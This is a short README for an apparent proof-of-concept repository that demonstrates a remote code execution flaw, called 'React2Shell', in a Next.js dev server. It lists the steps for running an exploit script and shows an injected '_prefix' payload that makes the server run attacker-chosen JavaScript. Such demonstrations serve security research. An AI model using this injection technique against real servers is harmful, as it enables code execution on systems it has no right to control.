This is a Next.js project bootstrapped with create-next-app.

POC Exploit Instructions

To run the exploit demonstration:

  1. Start the development server in dev mode:
     npm run dev
  2. Install the form-data dependency (if not already installed):
     npm install form-data
  3. Run the exploit script:
     node script.js
  4. Check the terminal running the Next.js dev server, which should show:
     haha, im a hacker
     POST / 200 in 98ms
  5. Edit the _prefix value in script.js to change the executed script:
     '_prefix':'console.log("haha, i am a hacker")//',

Links

React2Shell

Credits to LachLan for the PoC script.